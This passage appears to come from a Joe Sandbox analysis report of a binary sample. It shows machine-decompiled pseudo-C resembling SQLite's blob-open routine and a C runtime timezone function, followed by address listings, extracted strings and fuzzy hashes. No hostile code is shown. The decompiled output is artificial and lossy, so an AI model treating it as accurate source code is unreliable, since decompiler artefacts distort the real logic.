								_t449 = _t449 + 0xc;
								goto L103;
							}
							if(( *(_t412 + 0x24) & 0x00000020) != 0) {
								_push(_t359);
								_push("cannot open table without rowid: %s");
								goto L102;
							}
							if( *((intOrPtr*)(_t412 + 0xc)) != 0) {
								_push(_t359);
								_push("cannot open view: %s");
								goto L102;
							}
							 *(_t434 + 0x1c) = _t412;
							_t386 = 0xfff0bdc0;
							_t438 =  *((intOrPtr*)(_t412 + 0x48));
							if(_t438 == 0) {
								L24:
								_t434 = _v548;
								_t360 = 0;
								_v528 = 0;
								 *((intOrPtr*)(_t434 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t428 + 0x10)) + (_t386 + _t386) * 8));
								_t388 =  *((short*)(_t412 + 0x2a));
								_v524 = _t388;
								if(_t388 <= 0) {
									L35:
									if(_t360 == _t388) {
										_t294 = E00D97470(_t428, "no such column: \"%s\"", _v508);
										_t449 = _t449 + 0xc;
										_v540 = 1;
										__eflags =  *((char*)(_t428 + 0x51));
										_t355 = _t294;
										if( *((char*)(_t428 + 0x51)) == 0) {
											L00DA6E40(_t428);
										}
										L89:
										_t437 =  *(_t434 + 0x10);
										__eflags = _t437;
										if(_t437 == 0) {
											L94:
											__eflags =  *(_t428 + 0x1d0);
											if( *(_t428 + 0x1d0) == 0) {
												_t380 = _v548;
												__eflags = _t380 -  *((intOrPtr*)(_t428 + 0x128));
												if(_t380 <  *((intOrPtr*)(_t428 + 0x128))) {
													L117:
													E00D95050(_t380);
													_t449 = _t449 + 4;
													L118:
													__eflags = _t355;
													_t263 =  ==  ? 0 : "%s";
													E00D980F0(_t428, _v540,  ==  ? 0 : "%s", _t355);
													_t450 = _t449 + 0x10;
													__eflags = _t355;
													if(_t355 == 0) {
														L125:
														_t373 = _v412;
														_t435 = _v484;
														__eflags = _t373;
														if(_t373 == 0) {
															L133:
															_t413 = _v408;
															__eflags = _v408;
															if(_v408 != 0) {
																E00DCDAB0(_t435, _t413);
															}
															__eflags = _t435;
															if(_t435 != 0) {
																_t242 = _t435 + 0x108;
																 *_t242 =  *(_t435 + 0x108) - (_v460 & 0x000000ff);
																__eflags =  *_t242;
															}
															__eflags =  *((char*)(_t428 + 0x49));
															_v460 = 0;
															if( *((char*)(_t428 + 0x49)) != 0) {
																L140:
																_t356 = L00D957E0();
																goto L141;
															} else {
																_t358 = _v540;
																__eflags = _t358 - 0xc0a;
																if(_t358 == 0xc0a) {
																	goto L140;
																}
																_t356 = _t358 &  *(_t428 + 0x3c);
																L141:
																_t267 =  *(_t428 + 0xc);
																__eflags = _t267;
																if(_t267 != 0) {
																	 *0xed947c(_t267);
																	_t450 = _t450 + 4;
																}
																_pop(_t429);
																_pop(_t436);
																_pop(_t357);
																__eflags = _v8 ^ _t450;
																return E00E76672(_t356, _t357, _v8 ^ _t450, _t413, _t429, _t436);
															}
														}
														__eflags = _t435;
														if(_t435 == 0) {
															L132:
															E00D95050(_t373);
															_t450 = _t450 + 4;
															goto L133;
														}
														__eflags =  *(_t435 + 0x1d0);
														if( *(_t435 + 0x1d0) == 0) {
															__eflags = _t373 -  *((intOrPtr*)(_t435 + 0x128));
															if(_t373 <  *((intOrPtr*)(_t435 + 0x128))) {
																goto L132;
															}
															__eflags = _t373 -  *((intOrPtr*)(_t435 + 0x12c));
															if(_t373 >=  *((intOrPtr*)(_t435 + 0x12c))) {
																goto L132;
															}
															 *_t373 =  *(_t435 + 0x124);
															 *(_t435 + 0x124) = _t373;
															goto L133;
														}
														E00D950C0(_t435, _t373);
														goto L133;
													}
													__eflags =  *(_t428 + 0x1d0);
													if( *(_t428 + 0x1d0) == 0) {
														__eflags = _t355 -  *((intOrPtr*)(_t428 + 0x128));
														if(_t355 <  *((intOrPtr*)(_t428 + 0x128))) {
															L124:
															E00D95050(_t355);
															_t450 = _t450 + 4;
															goto L125;
														}
														__eflags = _t355 -  *((intOrPtr*)(_t428 + 0x12c));
														if(_t355 >=  *((intOrPtr*)(_t428 + 0x12c))) {
															goto L124;
														}
														 *_t355 =  *(_t428 + 0x124);
														 *(_t428 + 0x124) = _t355;
														goto L125;
													}
													E00D950C0(_t428, _t355);
													goto L125;
												}
												__eflags = _t380 -  *((intOrPtr*)(_t428 + 0x12c));
												if(_t380 >=  *((intOrPtr*)(_t428 + 0x12c))) {
													goto L117;
												}
												 *_t380 =  *(_t428 + 0x124);
												 *(_t428 + 0x124) = _t380;
												goto L118;
											}
											E00D950C0(_t428, _v548);
											goto L118;
										}
										_t282 =  *((intOrPtr*)(_t437 + 0x14));
										__eflags = _t282 - 0x2df20da3;
										if(__eflags == 0) {
											L92:
											E00DB8BA0(_t437, _t412, __eflags);
											L93:
											E00DB8EF0();
											goto L94;
										}
										__eflags = _t282 - 0x319c2973;
										if(__eflags != 0) {
											goto L93;
										}
										goto L92;
									}
									if(_a28 == 0) {
										L55:
										_t430 = L00DB5FB0( &_v484, _t412, _t487);
										 *(_t434 + 0x10) = _t430;
										if(_t430 == 0) {
											L80:
											_t428 = _v544;
											 *((short*)(_t434 + 8)) = _v528;
											 *((intOrPtr*)(_t434 + 0x14)) = _t428;
											if( *((char*)(_t428 + 0x51)) == 0) {
												L00DA6E40(_t428);
											}
											if( *((char*)(_t428 + 0x49)) != 0) {
												break;
											} else {
												_t412 =  &_v512;
												_t261 = E00DC51F0(_t434,  &_v512, _a20, _a24);
												_t449 = _t449 + 8;
												_t393 = _v500 + 1;
												_v540 = _t261;
												_v500 = _t393;
												if(_t393 >= 0x32 || _t261 != 0x11) {
													_t355 = _v512;
													L109:
													__eflags = _t261;
													if(_t261 != 0) {
														L112:
														__eflags = _t434;
														if(_t434 == 0) {
															goto L118;
														}
														goto L89;
													}
													__eflags =  *((intOrPtr*)(_t428 + 0x49)) - _t261;
													if( *((intOrPtr*)(_t428 + 0x49)) != _t261) {
														goto L112;
													}
													 *_v488 = _t434;
													goto L118;
												} else {
													_t354 = _v512;
													_v532 = _t354;
													continue;
												}
											}
										}
										_t439 = 0xfff0bdc0;
										_t397 =  *((intOrPtr*)(_v536 + 0x48));
										if(_t397 == 0) {
											L61:
											_t419 =  *(_t430 + 0x88);
											_t361 =  *_t397;
											_v504 =  *((intOrPtr*)(_t397 + 4));
											_t301 =  *((intOrPtr*)(_t430 + 0xc));
											_v520 =  *_t397;
											_t494 =  *((intOrPtr*)(_t301 + 0x30)) - _t419;
											if( *((intOrPtr*)(_t301 + 0x30)) > _t419) {
												 *(_t430 + 0x88) = _t419 + 1;
												_t398 = _t419 + _t419 * 4;
												_t303 =  *((intOrPtr*)(_t430 + 0x58));
												 *((intOrPtr*)(_t303 + 8 + _t398 * 4)) = _v516;
												 *((intOrPtr*)(_t303 + _t398 * 4)) = 2;
												 *((intOrPtr*)(_t303 + 4 + _t398 * 4)) = _t439;
												 *((intOrPtr*)(_t303 + 0xc + _t398 * 4)) = _v520;
												 *(_t303 + 0x10 + _t398 * 4) = 0;
											} else {
												_t398 = _t430;
												_t327 = E00DB6210(2, _t494, _t439, _v516, _t361);
												_t449 = _t449 + 0xc;
												_t419 = _t327;
											}
											if( *((char*)( *_t430 + 0x49)) == 0) {
												_t326 =  *((intOrPtr*)(_t430 + 0x58));
												_t398 = _t419 + _t419 * 4;
												 *((char*)(_t326 + 1 + _t398 * 4)) = 0xfd;
												 *((intOrPtr*)(_t326 + 0x10 + _t398 * 4)) = _v504;
											}
											_t305 =  *(_t430 + 0x88);
											if(_t305 > 0) {
												_t398 = _t305 + _t305 * 4;
												 *((short*)( *((intOrPtr*)(_t430 + 0x58)) + _t398 * 4 - 0x12)) = 1;
											}
											_push(_t398);
											_t412 = 6;
											_t364 = E00DB68E0(_t430, 6, 0xecb0dc);
											_t449 = _t449 + 8;
											asm("bts eax, esi");
											if(_t439 != 1 &&  *((char*)( *((intOrPtr*)( *((intOrPtr*)( *_t430 + 0x10)) + 4 + (_t439 + _t439) * 8)) + 9)) != 0) {
												asm("bts eax, esi");
											}
											if( *((char*)(_v544 + 0x49)) == 0) {
												_t400 = _v536;
												 *((intOrPtr*)(_t364 + 4)) = _t439;
												 *((intOrPtr*)(_t364 + 8)) =  *((intOrPtr*)(_t400 + 0x1c));
												 *(_t364 + 0xc) = _v516;
												_t311 =  *_t400;
												if( *((char*)( *_t430 + 0x49)) == 0) {
													_t412 =  *((intOrPtr*)(_t430 + 0x58)) + 0x28;
													__eflags =  *((intOrPtr*)(_t430 + 0x58)) + 0x28;
													E00DB6C60( *((intOrPtr*)(_t430 + 0x58)) + 0x28, _t311, 0);
													_t449 = _t449 + 8;
												} else {
													_t412 = 0;
													E00DB6AE0(_t364, 0, _t430, _t311);
													_t449 = _t449 + 4;
												}
												if( *((char*)(_v544 + 0x49)) == 0) {
													if(_a28 != 0) {
														 *((char*)(_t364 + 0x14)) = 0x69;
													}
													_t403 = _v536;
													_t412 =  &_v484;
													 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t403 + 0x1c));
													 *((intOrPtr*)(_t364 + 0x20)) = _t439;
													 *((char*)(_t364 + 0x15)) = 0xfd;
													 *((intOrPtr*)(_t364 + 0x24)) =  *((short*)(_t403 + 0x2a)) + 1;
													 *((intOrPtr*)(_t364 + 0x44)) =  *((short*)(_t403 + 0x2a));
													_v88 = 0;
													_v440 = 1;
													_v444 = 1;
													L00DB77D0(_t430,  &_v484);
												}
											}
											_t434 = _v548;
											goto L80;
										}
										_t328 = _v544;
										_t439 = 0;
										_t424 =  *((intOrPtr*)(_t328 + 0x14));
										if(_t424 <= 0) {
											goto L61;
										}
										_t330 =  *((intOrPtr*)(_t328 + 0x10)) + 0xc;
										while( *_t330 != _t397) {
											_t439 = _t439 + 1;
											_t330 = _t330 + 0x10;
											if(_t439 < _t424) {
												continue;
											}
											goto L61;
										}
										goto L61;
									}
									_t431 = 0;
									if(( *(_v544 + 0x1c) & 0x00004000) == 0) {
										L43:
										_t366 =  *((intOrPtr*)(_v536 + 8));
										_v524 = _t366;
										if(_t366 == 0) {
											L53:
											_t487 = _t431;
											if(_t431 != 0) {
												_t428 = _v544;
												_t332 = E00D97470(_t428, "cannot open %s column for writing", _t431);
												_t449 = _t449 + 0xc;
												_v540 = 1;
												__eflags =  *((char*)(_t428 + 0x51));
												_t355 = _t332;
												if( *((char*)(_t428 + 0x51)) == 0) {
													L00DA6E40(_t428);
												}
												_t434 = _v548;
												goto L89;
											}
											_t434 = _v548;
											goto L55;
										}
										do {
											_t440 =  *(_t366 + 0x32) & 0x0000ffff;
											_t334 = 0;
											if(_t440 == 0) {
												goto L52;
											}
											_t408 =  *((intOrPtr*)(_t366 + 4));
											_t367 = _t408;
											_v520 = _t408;
											do {
												_t412 =  *(_t367 + _t334 * 2) & 0x0000ffff;
												if(_t412 == _v528 || _t412 == 0xfffe) {
													_t431 = "indexed";
												}
												_t334 = _t334 + 1;
											} while (_t334 < _t440);
											_t366 = _v524;
											L52:
											_t366 =  *((intOrPtr*)(_t366 + 0x14));
											_v524 = _t366;
										} while (_t366 != 0);
										goto L53;
									}
									_t441 =  *((intOrPtr*)(_t412 + 0x10));
									if(_t441 == 0) {
										goto L43;
									} else {
										goto L39;
									}
									do {
										L39:
										_t412 =  *(_t441 + 0x14);
										if(_t412 <= 0) {
											goto L42;
										}
										_t410 = _t441 + 0x24;
										do {
											_t410 = _t410 + 8;
											_t336 =  !=  ? _t431 : "foreign key";
											_t431 =  !=  ? _t431 : "foreign key";
											_t412 = _t412 - 1;
										} while (_t412 != 0);
										L42:
										_t441 =  *((intOrPtr*)(_t441 + 4));
									} while (_t441 != 0);
									goto L43;
								}
								_t432 =  *((intOrPtr*)(_t412 + 4));
								_t442 =  *(( *_v508 & 0x000000ff) + 0xecc550) & 0x000000ff;
								_v520 = _t442;
								do {
									_t425 =  *_t432;
									_t368 =  *_t425;
									if(( *((_t368 & 0x000000ff) + 0xecc550) & 0x000000ff) != _t442) {
										goto L31;
									}
									_t444 = _v508 - _t425;
									while(_t368 != 0) {
										_t342 =  *(_t444 + _t425 + 1) & 0x000000ff;
										_t425 = _t425 + 1;
										_t368 =  *_t425;
										if(( *((_t368 & 0x000000ff) + 0xecc550) & 0x000000ff) == ( *(_t342 + 0xecc550) & 0x000000ff)) {
											continue;
										}
										_t388 = _v524;
										_t442 = _v520;
										goto L31;
									}
									_t360 = _v528;
									_t388 = _v524;
									L34:
									_t428 = _v544;
									_t412 = _v536;
									_t434 = _v548;
									goto L35;
									L31:
									_t432 = _t432 + 0x10;
									_t360 = _v528 + 1;
									_v528 = _t360;
								} while (_t360 < _t388);
								goto L34;
							}
							_t426 =  *((intOrPtr*)(_t428 + 0x14));
							_t386 = 0;
							if(_t426 <= 0) {
								L23:
								_t412 = _v536;
								goto L24;
							}
							_t347 =  *((intOrPtr*)(_t428 + 0x10)) + 0xc;
							while( *_t347 != _t438) {
								_t386 = _t386 + 1;
								_t347 = _t347 + 0x10;
								if(_t386 < _t426) {
									continue;
								}
								goto L23;
							}
							goto L23;
						}
					}
					if( *(_t428 + 0x1d0) == 0) {
						__eflags = _t354 -  *((intOrPtr*)(_t428 + 0x128));
						if(_t354 <  *((intOrPtr*)(_t428 + 0x128))) {
							L11:
							E00D95050(_t354);
							_t449 = _t449 + 4;
							goto L12;
						}
						__eflags = _t354 -  *((intOrPtr*)(_t428 + 0x12c));
						if(_t354 >=  *((intOrPtr*)(_t428 + 0x12c))) {
							goto L11;
						}
						 *_t354 =  *(_t428 + 0x124);
						 *(_t428 + 0x124) = _t354;
					} else {
						E00D950C0(_t428, _t354);
					}
					goto L12;
				}
				_t261 = _v540;
				_t355 = _v532;
				goto L109;
			}

0x00dc5370
0x00dc5376
0x00dc537c
0x00dc5383
0x00dc538d
0x00dc5390
0x00dc5397
0x00dc539f
0x00dc53a3
0x00dc53a7
0x00dc53b0
0x00dc53b3
0x00dc53b7
0x00dc53bc
0x00dc53c0
0x00dc53c3
0x00dc53c7
0x00dc53cf
0x00dc53d5
0x00dc53d8
0x00dc53de
0x00dc53de
0x00dc53ec
0x00dc53ee
0x00dc53f1
0x00dc53f7
0x00dc53f9
0x00dc53fc
0x00dc53ff
0x00dc53ff
0x00dc5403
0x00dc540f
0x00dc5414
0x00dc5419
0x00000000
0x00000000
0x00dc541f
0x00dc5425
0x00dc5464
0x00dc5466
0x00dc546a
0x00dc5471
0x00dc5475
0x00dc5475
0x00dc547e
0x00dc548e
0x00dc5490
0x00dc5493
0x00dc5499
0x00dc593b
0x00dc593b
0x00dc593f
0x00dc5941
0x00dc5943
0x00dc5947
0x00dc5947
0x00dc594f
0x00dc5953
0x00dc595b
0x00dc595f
0x00dc595f
0x00dc5964
0x00000000
0x00dc549f
0x00dc54a3
0x00dc5928
0x00dc5929
0x00dc592e
0x00dc5932
0x00dc5933
0x00dc5938
0x00000000
0x00dc5938
0x00dc54ad
0x00dc5920
0x00dc5921
0x00000000
0x00dc5921
0x00dc54b7
0x00dc5918
0x00dc5919
0x00000000
0x00dc5919
0x00dc54bd
0x00dc54c0
0x00dc54c5
0x00dc54ca
0x00dc54f0
0x00dc54f5
0x00dc54f9
0x00dc54fb
0x00dc5502
0x00dc5505
0x00dc5509
0x00dc550f
0x00dc558f
0x00dc5591
0x00dc58f7
0x00dc58fc
0x00dc58ff
0x00dc5907
0x00dc590b
0x00dc590d
0x00dc5911
0x00dc5911
0x00dc58a1
0x00dc58a1
0x00dc58a4
0x00dc58a6
0x00dc58c7
0x00dc58c7
0x00dc58ce
0x00dc598f
0x00dc5993
0x00dc5999
0x00dc59b3
0x00dc59b4
0x00dc59b9
0x00dc59bc
0x00dc59c3
0x00dc59c6
0x00dc59d0
0x00dc59d5
0x00dc59d8
0x00dc59da
0x00dc5a19
0x00dc5a19
0x00dc5a20
0x00dc5a24
0x00dc5a26
0x00dc5a69
0x00dc5a69
0x00dc5a70
0x00dc5a72
0x00dc5a76
0x00dc5a76
0x00dc5a7b
0x00dc5a7d
0x00dc5a84
0x00dc5a84
0x00dc5a84
0x00dc5a84
0x00dc5a8a
0x00dc5a8e
0x00dc5a93
0x00dc5aa6
0x00dc5aad
0x00000000
0x00dc5a95
0x00dc5a95
0x00dc5a99
0x00dc5a9f
0x00000000
0x00000000
0x00dc5aa1
0x00dc5aaf
0x00dc5aaf
0x00dc5ab2
0x00dc5ab4
0x00dc5ab7
0x00dc5abd
0x00dc5abd
0x00dc5ac9
0x00dc5aca
0x00dc5acb
0x00dc5acc
0x00dc5ad6
0x00dc5ad6
0x00dc5a93
0x00dc5a28
0x00dc5a2a
0x00dc5a60
0x00dc5a61
0x00dc5a66
0x00000000
0x00dc5a66
0x00dc5a2c
0x00dc5a33
0x00dc5a40
0x00dc5a46
0x00000000
0x00000000
0x00dc5a48
0x00dc5a4e
0x00000000
0x00000000
0x00dc5a56
0x00dc5a58
0x00000000
0x00dc5a58
0x00dc5a39
0x00000000
0x00dc5a39
0x00dc59dc
0x00dc59e3
0x00dc59f0
0x00dc59f6
0x00dc5a10
0x00dc5a11
0x00dc5a16
0x00000000
0x00dc5a16
0x00dc59f8
0x00dc59fe
0x00000000
0x00000000
0x00dc5a06
0x00dc5a08
0x00000000
0x00dc5a08
0x00dc59e9
0x00000000
0x00dc59e9
0x00dc599b
0x00dc59a1
0x00000000
0x00000000
0x00dc59a9
0x00dc59ab
0x00000000
0x00dc59ab
0x00dc58da
0x00000000
0x00dc58da
0x00dc58a8
0x00dc58ab
0x00dc58b0
0x00dc58b9
0x00dc58bb
0x00dc58c0
0x00dc58c2
0x00000000
0x00dc58c2
0x00dc58b2
0x00dc58b7
0x00000000
0x00000000
0x00000000
0x00dc58b7
0x00dc559b
0x00dc563b
0x00dc5644
0x00dc5646
0x00dc564b
0x00dc5811
0x00dc5811
0x00dc5819
0x00dc581d
0x00dc5824
0x00dc5828
0x00dc5828
0x00dc5831
0x00000000
0x00dc5837
0x00dc583a
0x00dc5843
0x00dc584c
0x00dc584f
0x00dc5850
0x00dc5854
0x00dc585b
0x00dc58e4
0x00dc5975
0x00dc5975
0x00dc5977
0x00dc5986
0x00dc5986
0x00dc5988
0x00000000
0x00000000
0x00000000
0x00dc598a
0x00dc5979
0x00dc597c
0x00000000
0x00000000
0x00dc5982
0x00000000
0x00dc5866
0x00dc5866
0x00dc586a
0x00000000
0x00dc586a
0x00dc585b
0x00dc5831
0x00dc5655
0x00dc565a
0x00dc565f
0x00dc5680
0x00dc5683
0x00dc5689
0x00dc568b
0x00dc568f
0x00dc5692
0x00dc5696
0x00dc5699
0x00dc56bb
0x00dc56c1
0x00dc56c4
0x00dc56c7
0x00dc56cf
0x00dc56d6
0x00dc56da
0x00dc56de
0x00dc569b
0x00dc56a5
0x00dc56a8
0x00dc56ad
0x00dc56b0
0x00dc56b0
0x00dc56ec
0x00dc56ee
0x00dc56f1
0x00dc56f8
0x00dc56fd
0x00dc56fd
0x00dc5701
0x00dc5709
0x00dc570b
0x00dc5716
0x00dc5716
0x00dc571b
0x00dc5721
0x00dc572d
0x00dc572f
0x00dc5738
0x00dc5744
0x00dc575f
0x00dc5762
0x00dc5770
0x00dc5776
0x00dc577a
0x00dc5780
0x00dc5787
0x00dc578a
0x00dc5792
0x00dc57a9
0x00dc57a9
0x00dc57ac
0x00dc57b1
0x00dc5794
0x00dc5795
0x00dc5797
0x00dc579c
0x00dc579c
0x00dc57bc
0x00dc57c2
0x00dc57c4
0x00dc57c4
0x00dc57c8
0x00dc57cc
0x00dc57d3
0x00dc57d6
0x00dc57d9
0x00dc57e2
0x00dc57eb
0x00dc57f0
0x00dc57f8
0x00dc5800
0x00dc5808
0x00dc5808
0x00dc57bc
0x00dc580d
0x00000000
0x00dc580d
0x00dc5661
0x00dc5665
0x00dc5667
0x00dc566c
0x00000000
0x00000000
0x00dc5671
0x00dc5674
0x00dc5678
0x00dc5679
0x00dc567e
0x00000000
0x00000000
0x00000000
0x00dc567e
0x00000000
0x00dc5674
0x00dc55a5
0x00dc55ae
0x00dc55dc
0x00dc55e0
0x00dc55e3
0x00dc55e9
0x00dc562f
0x00dc562f
0x00dc5631
0x00dc5874
0x00dc587e
0x00dc5883
0x00dc5886
0x00dc588e
0x00dc5892
0x00dc5894
0x00dc5898
0x00dc5898
0x00dc589d
0x00000000
0x00dc589d
0x00dc5637
0x00000000
0x00dc5637
0x00dc55f0
0x00dc55f0
0x00dc55f4
0x00dc55f8
0x00000000
0x00000000
0x00dc55fa
0x00dc55fd
0x00dc55ff
0x00dc5603
0x00dc5603
0x00dc560e
0x00dc5616
0x00dc5616
0x00dc561b
0x00dc561c
0x00dc5620
0x00dc5624
0x00dc5624
0x00dc5627
0x00dc562b
0x00000000
0x00dc55f0
0x00dc55b0
0x00dc55b5
0x00000000
0x00000000
0x00000000
0x00000000
0x00dc55b7
0x00dc55b7
0x00dc55b7
0x00dc55bc
0x00000000
0x00000000
0x00dc55be
0x00dc55c1
0x00dc55c3
0x00dc55cb
0x00dc55ce
0x00dc55d0
0x00dc55d0
0x00dc55d5
0x00dc55d5
0x00dc55d8
0x00000000
0x00dc55b7
0x00dc5515
0x00dc551b
0x00dc5522
0x00dc5526
0x00dc5526
0x00dc5528
0x00dc5536
0x00000000
0x00000000
0x00dc553c
0x00dc5540
0x00dc5544
0x00dc5549
0x00dc5551
0x00dc555f
0x00000000
0x00000000
0x00dc5561
0x00dc5565
0x00000000
0x00dc5565
0x00dc557b
0x00dc557f
0x00dc5583
0x00dc5583
0x00dc5587
0x00dc558b
0x00000000
0x00dc5569
0x00dc556d
0x00dc5570
0x00dc5571
0x00dc5575
0x00000000
0x00dc5579
0x00dc54cc
0x00dc54cf
0x00dc54d3
0x00dc54ec
0x00dc54ec
0x00000000
0x00dc54ec
0x00dc54d8
0x00dc54e0
0x00dc54e4
0x00dc54e5
0x00dc54ea
0x00000000
0x00000000
0x00000000
0x00dc54ea
0x00000000
0x00dc54e0
0x00dc5499
0x00dc542e
0x00dc543b
0x00dc5441
0x00dc545b
0x00dc545c
0x00dc5461
0x00000000
0x00dc5461
0x00dc5443
0x00dc5449
0x00000000
0x00000000
0x00dc5451
0x00dc5453
0x00dc5430
0x00dc5434
0x00dc5434
0x00000000
0x00dc542e
0x00dc596d
0x00dc5971
0x00000000

Strings

cannot open view: %s, xrefs: 00DC5919
cannot open %s column for writing, xrefs: 00DC5878
cannot open virtual table: %s, xrefs: 00DC5929
0j, xrefs: 00DC59BE
no such column: "%s", xrefs: 00DC58F1
foreign key, xrefs: 00DC55C6
indexed, xrefs: 00DC5616
cannot open table without rowid: %s, xrefs: 00DC5921

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: 0j$cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 0-2078430034
Opcode ID: d138a9b8e351e0db77ad4bc221c9e9e3c956d7129dcf955adb47d707ce6fff4f
Instruction ID: dd09412fa4ad580668fafe04c9fedd1b89547f30c02ff0c305bb78ae9d663143
Opcode Fuzzy Hash: d138a9b8e351e0db77ad4bc221c9e9e3c956d7129dcf955adb47d707ce6fff4f
Instruction Fuzzy Hash: 24327070604B429FCB24CF28D480F6AB7E1BF88314F58465DE8999B356D731F895CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E94134 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E94134(void* __eflags, void* __fp0) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v56;
				char _v524;
				intOrPtr _v528;
				char _v532;
				char _v568;
				char _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t36;
				signed int _t41;
				void* _t45;
				signed int* _t57;
				signed int _t58;
				intOrPtr _t66;
				intOrPtr* _t70;
				signed int _t82;
				void* _t83;
				signed int _t84;
				intOrPtr* _t85;
				signed int _t86;
				signed int _t92;
				signed int _t96;
				signed int _t101;
				signed int _t102;
				intOrPtr _t113;
				void* _t118;

				_t118 = __fp0;
				_t85 = E00E93A23();
				_t70 = E00E93A29();
				_t1 =  &_v8; // 0xe9435d
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(E00E93A87(_t1) != 0 || E00E93A2F( &_v12) != 0 || E00E93A5B( &_v16) != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					L00E7CF2F();
					asm("int3");
					_t101 = _t102;
					_t32 =  *0xed8944; // 0xccebfc3b
					_v56 = _t32 ^ _t101;
					 *0xed8eb4 =  *0xed8eb4 | 0xffffffff;
					 *0xed8ea8 =  *0xed8ea8 | 0xffffffff;
					_push(_t70);
					_push(0);
					_push(_t85);
					 *0xeded50 = 0;
					_t36 = L00E9D78B(0, _t85, 0xec21f8, __eflags,  &_v572,  &_v568, 0x100, 0xec21f8);
					__eflags = _t36;
					if(_t36 != 0) {
						__eflags = _t36 - 0x22;
						if(_t36 == 0x22) {
							_t86 = E00E8E95D(_v528 + _v528);
							__eflags = _t86;
							if(__eflags != 0) {
								_t41 = L00E9D78B(0, _t86, 0xec21f8, __eflags,  &_v532, _t86, _v528, 0xec21f8);
								__eflags = _t41;
								if(_t41 == 0) {
									E00E8EC89(0);
								} else {
									_push(_t86);
									goto L20;
								}
							} else {
								_push(0);
								L20:
								E00E8EC89();
								_t86 = 0;
							}
						} else {
							_t86 = 0;
						}
					} else {
						_t86 =  &_v524;
					}
					asm("sbb esi, esi");
					_t92 =  ~(_t86 -  &_v524) & _t86;
					__eflags = _t86;
					if(__eflags == 0) {
						L28:
						E00E94134(__eflags, _t118);
					} else {
						__eflags =  *_t86;
						if(__eflags == 0) {
							goto L28;
						} else {
							_push(_t86);
							E00E93E93(__eflags, _t118);
						}
					}
					_t45 = E00E8EC89(_t92);
					__eflags = _v12 ^ _t101;
					return E00E76672(_t45, 0, _v12 ^ _t101, _t83, _t86, _t92);
				} else {
					E00E8EC89( *0xeded48);
					 *0xeded48 = 0;
					 *_t102 = 0xeded58;
					if(GetTimeZoneInformation(??) != 0xffffffff) {
						_t84 =  *0xeded58 * 0x3c;
						_t82 = 1;
						_t113 =  *0xeded9e; // 0x0
						_t96 =  *0xededac; // 0x0
						 *0xeded50 = 1;
						_v8 = _t84;
						if(_t113 != 0) {
							_v8 = _t96 * 0x3c + _t84;
						}
						if( *0xededf2 == 0) {
							L9:
							_t58 = 0;
							_t82 = 0;
							__eflags = 0;
						} else {
							_t66 =  *0xedee00; // 0x0
							if(_t66 == 0) {
								goto L9;
							} else {
								_t58 = (_t66 - _t96) * 0x3c;
							}
						}
						_v12 = _t82;
						_v16 = _t58;
						E00E79BD0(_t85,  *_t70, 0, 0x80);
						E00E79BD0(_t85,  *((intOrPtr*)(_t70 + 4)), 0, 0x80);
						E00E79BD0(_t85,  *_t85, 0, 0x40);
						E00E79BD0(_t85,  *((intOrPtr*)(_t85 + 4)), 0, 0x40);
						_t99 = E00E8CB36(_t84, _t118);
						E00E94373(_t70, _t84, _t85, _t63, _t118, 0xeded5c,  *_t70,  *_t85, _t63);
						E00E94373(_t70, _t84, _t85, _t63, _t118, 0xededb0,  *((intOrPtr*)(_t70 + 4)),  *((intOrPtr*)(_t85 + 4)), _t99);
					}
					_t15 =  &_v8; // 0xe9435d
					 *((intOrPtr*)(E00E93A1D())) =  *_t15;
					 *(E00E93A11()) = _v12;
					_t57 = E00E93A17();
					 *_t57 = _v16;
					return _t57;
				}
			}

0x00e94134
0x00e94144
0x00e9414b
0x00e9414f
0x00e94152
0x00e94156
0x00e94159
0x00e94164
0x00e94283
0x00e94284
0x00e94285
0x00e94286
0x00e94287
0x00e94288
0x00e9428d
0x00e94291
0x00e94299
0x00e942a0
0x00e942a3
0x00e942b0
0x00e942b7
0x00e942b8
0x00e942b9
0x00e942ce
0x00e942d5
0x00e942dd
0x00e942df
0x00e942e9
0x00e942ec
0x00e94300
0x00e94303
0x00e94305
0x00e94320
0x00e94328
0x00e9432a
0x00e94330
0x00e9432c
0x00e9432c
0x00000000
0x00e9432c
0x00e94307
0x00e94307
0x00e94308
0x00e94308
0x00e9430d
0x00e9430d
0x00e942ee
0x00e942ee
0x00e942ee
0x00e942e1
0x00e942e1
0x00e942e1
0x00e94342
0x00e94344
0x00e94346
0x00e94348
0x00e94358
0x00e94358
0x00e9434a
0x00e9434a
0x00e9434d
0x00000000
0x00e9434f
0x00e9434f
0x00e94350
0x00e94355
0x00e9434d
0x00e9435e
0x00e94369
0x00e94372
0x00e9418e
0x00e94194
0x00e94199
0x00e9419f
0x00e941af
0x00e941b5
0x00e941be
0x00e941bf
0x00e941c6
0x00e941cc
0x00e941d2
0x00e941d5
0x00e941dc
0x00e941dc
0x00e941e7
0x00e941f9
0x00e941f9
0x00e941fb
0x00e941fb
0x00e941e9
0x00e941e9
0x00e941f0
0x00000000
0x00e941f2
0x00e941f4
0x00e941f4
0x00e941f0
0x00e94202
0x00e94206
0x00e9420d
0x00e94219
0x00e94223
0x00e9422e
0x00e94238
0x00e94244
0x00e94258
0x00e9425d
0x00e94260
